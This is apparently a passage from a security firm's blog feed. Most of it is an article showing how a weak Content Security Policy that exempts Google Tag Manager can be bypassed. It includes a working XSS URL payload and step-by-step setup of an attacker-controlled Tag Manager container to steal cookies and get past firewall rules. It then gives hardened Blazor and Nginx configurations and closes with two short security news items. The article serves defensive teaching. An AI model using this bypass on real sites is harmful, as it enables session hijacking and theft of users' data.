Because of this, many enterprises end up with a CSP that is defined, but does not require a nonce or a hash. Even worse, many tech bloggers ran with this and so now most of the third-party setup guides for Google Tag Manager just outright say to include an unsafe-inline or even an unsafe-eval directive.

However, as soon as an organization adds an unsafe-inline directive without a nonce, malicious actors gain an attack vector. Consider the site below which does not use a nonce and includes an unsafe-inline directive. Perhaps if a novice were to attempt to exploit this, they may naïvely try to include a script tag, see the attack fail, and assume the configuration is safe:

A site which does not use a nonce and includes an unsafe-inline directive.

However, most malicious actors (and even automated scanners) are going to find the shortcut, as simply inlining the script through an image tag results in the same XSS vulnerability:

Inlining the script through an image tag allows the XSS to work.

But that isn’t all! Since there was not a nonce, now attackers can use your CSP exemption for Google Tag Manager to perform much more elaborate attacks. 

Imagine this were a typical web application with some eCommerce functionality. A malicious actor might want to target admin users once every session for authentication tokens and on the /admin/logs page to hide evidence. Perhaps they also wanted to target regular users only on the billing page (to copy their card numbers). Then they would want to exfiltrate this data to an external domain. Getting all of that JavaScript to fit in the URL when IIS rejects more than 2048 characters in a URL is possible but comes with some negative tradeoffs. It becomes especially difficult when a firewall keeps blocking key parts of your attack. A stealthier approach is to use the existing CSP exemption for googletagmanager.com. This works, because as it turns out, Google will let anyone sign up for and host JavaScript from that domain. 

Bypassing CSP Via Google Tag Manager

This attack is great to bypass Web Application Firewalls (WAFs) and only requires three prerequisites

  1. A site vulnerable to injection-based attacks like XSS
  2. A site without a nonce in the CSP for Google Tag Manager
  3. An unsafe directive in the CSP for Google Tag Manager

If you have those three things, the rest is simple. First, sign into any google account and visit https://tagmanager.google.com/. Select Create Account, and the screen will look like the image below. You can put anything you want in the fields, but we will be selecting a Target Platform of Web for purposes of this demo (since we are hacking my demo web server):

Account on tagmanager.google.com

Click to continue then configure your tag. If the vulnerable CSP has an unsafe-inline statement, use Custom HTML. If the target application is using unsafe-eval, use Custom JavaScript.  If it is doing both, do whatever you feel most comfortable with. We will use Custom HTML. Note this is sandboxed JavaScript, but you can still accomplish everything you need for account takeovers, content injection/manipulation, data theft and so on:

Configuring your tag

Now just a few more quick things. Every application is different, so the code in this section is only limited by your imagination. Put all the code you want to execute on the target website in this snippet:

Add whatever custom code you like

You will need to add a trigger. If you are familiar with JavaScript, you can think of triggers as onEvent handlers. Many of them function as a thin wrapper around those same handlers. We want it on the default trigger type of Page View for All Pages:

Adding a trigger

After you add a trigger, just publish your changes by pressing submit:

Publish your changes

Now you use the GTM-XXXXXXXX value found near the submit button. You will place it in the id parameter of the URL. For example, googletagmanager.com/gtm.js?id=GTM-TXZ46JJC is the URL I used for this attack. Now you are ready to bypass that CSP using googletagmanager.com.

Below I will use simple JavaScript in the URL to append a script element to the page.

https://vuln.is/csp/?name=%3Cimg%20src=x%20onerror=%22var%20s=document.createElement(%27script%27);%20s.src=%27https://www.googletagmanager.com/gtm.js?id=GTM-TXZ46JJC%27;%20document.head.appendChild(s);%22%3E

Using simple JavaScript in the URL to append a script element to the page.

So what happened? A weak CSP policy led to an attacker injecting an external resource, in this instance a new Google Tag Manager container, that served malicious JavaScript to the site’s users. While this attack only demonstrated a reflected XSS, in many respects a stored XSS works even better with this exploit. The ability to dynamically edit your script even after you have placed your stored XSS gives a ton of flexibility to attackers. As previously noted, this is also especially powerful against WAFs.  

WAF Bypass with Google Tag Manager

In production enterprise environments, it is common to encounter some kind of Web Application Firewall (WAF). If we configured a basic free Cloudflare account and utilized their free WAF, this attack would still work fine as it does not even catch onerror=alert(1)

However, enterprises often invest in firewalls with advanced rulesets and thousands of rules. Let’s imagine a scenario where the WAF has two redundant rules for catching a call to document.cookie which is a common target due to misconfigured cookies and critically can lead to privilege escalation during XSS attacks. The first instance removes the word cookie and replaces it with null. You can see in Cloudflare’s Trace tool that it blocks a typical payload which attempts to access an authentication token stored in a cookie:

Cloudflare’s Trace tool blocking a typical payload which attempts to access an authentication token stored in a cookie

The second rule also blocks any instances of cookie in URI parameters:

The second rule also blocks any instances of cookie in URI paramet

Of course, these rules will also block it in a browser:

The rule also blocks the attack in browsers

While these are simple rules, you will find variations of these in large production-ready rulesets such as the OWASP ruleset like in rule 941180 which places document.cookie on the deny list:

Rulesets placing document.cookie on the deny list

Additionally, I have seen this bypass work against generic ASP.NET firewalls as well. The payload is exactly the same as the CSP bypass shown above. Those exact same steps will result in the code execution. You can see below where my external JavaScript library, hosted on Google Tag Manager, was able to access document.cookie and bypass both the WAF and the CSP:

Ryan's external JavaScript library, hosted on Google Tag Manager, was able to access document.cookie and bypass both the WAF and the CSP.

This works because we are not letting the WAF see our actual JavaScript. It is all being loaded from Google Tag Manager which has an unsafe directive. All of the malicious JavaScript is placed in a Custom HTML tag which is reflectively loaded via XSS.

Remediation

First, consider using something other than Google Analytics. I personally use umami.js, and it works great for everything I need. It should work for most small to medium-sized businesses’ needs. You can even self-host it, which is great for businesses who cannot risk a data leak or who face greater regulatory scrutiny. 

Unfortunately, for most organizations it isn’t as simple as switching to another analytics library. So, if your organization is sticking with Google Analytics, then you may have noticed I am advocating for the usage of strict-dynamic, which will allow additional scripts from the source to load as long as they are loaded  via non-"parser-inserted" script elements [source]. Which, in our Google Tag Manager centric case, means that Custom HTML tags will work (even if they include JavaScript); however, Custom JavaScript will not work. You can still do additional workarounds to make Custom JavaScript work, or, alternatively, you can migrate Custom JavaScript to Custom HTML in the Tag Manager container. 

Deploying a Secure CSP with .NET Blazor App and Google Tag Manager

However, for a more concrete example, consider this modern .NET 8 Blazor app. In Program.cs I generated my nonce, added it to my context, and set my CSP with a nonce and the strict-dynamic directive:

// CSP nonce + header middleware (must run early, before StaticFiles)
app.Use(async (context, next) =>
{
    var nonce = Convert.ToBase64String(RandomNumberGenerator.GetBytes(32));
    context.Items["CSP-Nonce"] = nonce;

    context.Response.OnStarting(() =>
    {
        // Strict CSP compatible with Blazor Server and GTM, no unsafe directives
        var csp = string.Join(" ", new[]
        {
            "default-src 'self';",
            "object-src 'none';",
            "frame-ancestors 'self';",
            // Allow inline scripts only via per-request nonce; allow GTM/GA hosts
            $"script-src 'self' 'nonce-{nonce}' 'strict-dynamic' https://www.googletagmanager.com;",
            // Blazor Server requires WebSockets; allow GA/GTM connect endpoints
            "connect-src 'self' wss: https://www.google-analytics.com https://www.googletagmanager.com;",
            // Images from HTTPS and data URLs
            "img-src 'self' data: https://www.googletagmanager.com;",
            // Images from HTTPS and data URLs
            $"style-src 'self' 'nonce-{nonce}' https://www.googletagmanager.com;",
        });

        var headerName = app.Environment.IsDevelopment() ? "Content-Security-Policy-Read-Only" : "Content-Security-Policy";
        context.Response.Headers[headerName] = csp;
        return Task.CompletedTask;
    });

    await next();
});

Then, in my App.razor file, I injected the context with the nonce value:

@inject Microsoft.AspNetCore.Http.IHttpContextAccessor HttpContextAccessor
@inject Microsoft.Extensions.Configuration.IConfiguration Configuration
@{
    var nonce = HttpContextAccessor?.HttpContext?.Items["CSP-Nonce"] as string;
    var gtmId = Configuration["GoogleTagManager:ContainerId"];
    bool hasGtm = !string.IsNullOrWhiteSpace(gtmId);
}

In the same App.razor file, I then added the nonce to scripts:

    @if (hasGtm)
    {
        <script nonce="@nonce">
            (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
                    new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
                j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
                'https://www.googletagmanager.com/gtm.js?id='+i+dl;var n=d.querySelector('[nonce]');
                n&&j.setAttribute('nonce',n.nonce||n.getAttribute('nonce'));f.parentNode.insertBefore(j,f);
            })(window,document,'script','dataLayer','@gtmId');
        </script>
        <style nonce="@nonce">
            .gtm-noscript-iframe{display:none;visibility:hidden}
        </style>
    }

    <HeadOutlet/>
</head>

<body>
@if (hasGtm)
{
    <noscript>
        <iframe src="proxy.php?url=https://www.googletagmanager.com/ns.html?id=@gtmId" height="0" width="0" class="gtm-noscript-iframe" aria-hidden="true"></iframe>
    </noscript>
}
<Routes/>
<script src="proxy.php?url=_framework/blazor.web.js" nonce="@nonce"></script>
</body>

Lastly, I ensured that I placed the correct Tag Manager ID in my appsettings.json file:

"GoogleTagManager": {
  "ContainerId": "GTM-5HC6NRH3"
},

As long as you place the nonce on all of your scripts (don’t forget the Blazor script), then your page will load with the Custom HTML from Google Tag Manager and malicious actors cannot carry out the attack outlined above.

As long as you placed the nonce on all of your scripts, then your page loads with the Custom HTML from Google Tag Manager and malicious actors cannot carry out the attack outlined above.

Alternatively Deploying a Secure CSP with Nginx and Google Tag Manager

In Nginx, once you have a nonce generation mechanism, simply add the CSP to the desired location in your nginx.conf file:

    location / {
        js_set $nonce csp.nonce; #I used NJS. Modify this to fit your environment.
        add_header Content-Security-Policy "
            default-src 'self';
            script-src 'self' 'nonce-$nonce' 'strict-dynamic' https://www.googletagmanager.com https://www.google-analytics.com;
            object-src 'none';
            img-src 'self' ;
            connect-src none;
        " always; 
}

The Risk of Unsafe Content-Security Policy Directives

The reality is that many enterprises in tightly regulated industries have begun to reign in third party libraries. This is especially true for major hospitals and healthcare organizations, who are paying out tens of millions dollars due to misconfigured third party libraries. Even outside of tightly regulated industries, cookie governance has also been a major catalyst leading to increased scrutiny of third party libraries.

If you are subject to stricter regulations on data, a well-defined CSP not only protects against XSS but also can provide another buffer against unauthorized data transfer due to things like enhanced-matching and user-data Signals as well other features in Google’s client-side tracking scripts. 

Recap

A strong Content Security Policy (CSP) is one of the most effective defenses against Cross-site Scripting (XSS). While early CSP implementations were cumbersome, modern features like strict-dynamic make it easier to adopt without compromising on security or breaking core functionality. They are often the first step to creating a well-defined Content Security Policy. 

The trade-off many organizations run into is around integrations like Google Tag Manager (GTM) or Google Analytics, where hasty CSP exemptions (e.g. unsafe-inline) can quietly reintroduce the very risks you were aiming to mitigate. Instead, using per-request nonces and strict-dynamic gives you the ability to safely support necessary third-party scripts without inheriting technical debt, while still guarding against script injection attacks.

The Bottom Line

  • Don’t weaken your CSP by using unsafe-inline or unsafe-eval
  • Favor nonces and strict-dynamic for a balance of security and flexibility
  • Test carefully with your third-party integrations to ensure business needs are met without opening the door to attackers
  • Follow the remediation advice to secure your Nginx or Blazor application’s CSP while using Google Analytics

If you’ve made it this far, thanks for sticking with me! I hope you’ll take a look at other Security Recommendation blogs from the Raxis penetration testing team.

]]>
CVE-2025-59886 Eaton Exploit Code Published https://raxis.com/blog/cve-2025-59886-eaton-exploit-code-published/ Thu, 05 Feb 2026 12:00:00 +0000 https://raxis.com/?p=53114 Last December Eaton issued an advisory for their xComfort Ethernet Communication Interface (CVE-2025-59886) for a remote code execution/command injection vulnerability. Proof of concept exploit code has recently been published on GitHub

Eaton’s advisory was released on December 22nd, and the xComfort ECI product was discontinued and will no longer receive security updates after November 30th, 2025. If your organization uses these Eaton devices it is recommended to isolate them to prevent unauthorized access and to prioritize upgrading or replacing them with a supported alternative. 

For those of you on internal and external security teams, keep an eye out for Eaton xComfort so that we can bring attention to these out-of-date devices with trivially easy to exploit vulnerabilities. 

]]>
Publicly Accessible Database Discovered Hosting 149 Million Credentials https://raxis.com/blog/publicly-accessible-database-discovered-hosting-149-million-credentials/ Mon, 02 Feb 2026 12:00:00 +0000 https://raxis.com/?p=52042 A security researcher recently found a publicly accessible database that contained 149 million stolen credentials. The data contained millions of records for Gmail, Facebook and other sensitive services. While they were unable to determine the owner of the data, they did successfully get the hosting provider to remove the service, preventing others from accessing the data further, at least from that location.

While attackers stealing usernames and passwords and distributing them widely is troubling, there are still ways to protect yourself. Use MFA (multi-factor authentication) on all your accounts so that, even if a hacker has your password, they can’t access your account without your approval. Also don’t reuse passwords across accounts. This limits the impact of having a password stolen or leaked, as it will only work for that one site. Password managers are a great tool to make it easy to keep track of several different passwords. If you’re interested in more login security tips, please check out Brad Herring’s recent post about 8-character passwords.

]]>